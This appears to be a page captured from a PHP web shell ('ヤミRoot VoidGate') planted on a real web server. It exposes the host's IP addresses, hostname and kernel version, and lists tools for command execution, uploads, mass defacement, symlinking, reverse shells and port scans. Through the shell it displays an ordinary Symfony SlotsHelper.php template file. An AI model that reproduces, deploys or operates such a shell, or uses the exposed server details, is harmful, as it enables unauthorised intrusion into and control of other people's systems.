ヤミRoot VoidGate
User / IP
:
216.73.216.143
Host / Server
:
146.88.233.70 / dev.loger.cm
System
:
Linux hybrid1120.fr.ns.planethoster.net 3.10.0-957.21.2.el7.x86_64 #1 SMP Wed Jun 5 14:26:44 UTC 2019 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
logercm
/
dev.loger.cm
/
vendor
/
symfony
/
templating
/
Helper
/
Viewing: SlotsHelper.php
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Component\Templating\Helper; /** * SlotsHelper manages template slots. * * @author Fabien Potencier <fabien@symfony.com> */ class SlotsHelper extends Helper { protected $slots = []; protected $openSlots = []; /** * Starts a new slot. * * This method starts an output buffer that will be * closed when the stop() method is called. * * @throws \InvalidArgumentException if a slot with the same name is already started */ public function start(string $name) { if (\in_array($name, $this->openSlots)) { throw new \InvalidArgumentException(sprintf('A slot named "%s" is already started.', $name)); } $this->openSlots[] = $name; $this->slots[$name] = ''; ob_start(); ob_implicit_flush(0); } /** * Stops a slot. * * @throws \LogicException if no slot has been started */ public function stop() { if (!$this->openSlots) { throw new \LogicException('No slot started.'); } $name = array_pop($this->openSlots); $this->slots[$name] = ob_get_clean(); } /** * Returns true if the slot exists. * * @return bool */ public function has(string $name) { return isset($this->slots[$name]); } /** * Gets the slot value. * * @param bool|string $default The default slot content * * @return string */ public function get(string $name, $default = false) { return $this->slots[$name] ?? $default; } /** * Sets a slot value. */ public function set(string $name, string $content) { $this->slots[$name] = $content; } /** * Outputs a slot. * * @param bool|string $default The default slot content * * @return bool true if the slot is defined or if a default content has been provided, false otherwise */ public function output(string $name, $default = false) { if (!isset($this->slots[$name])) { if (false !== $default) { echo $default; return true; } return false; } echo $this->slots[$name]; return true; } /** * Returns the canonical name of this helper. * * @return string */ public function getName() { return 'slots'; } }
Coded With 💗 by
0x6ick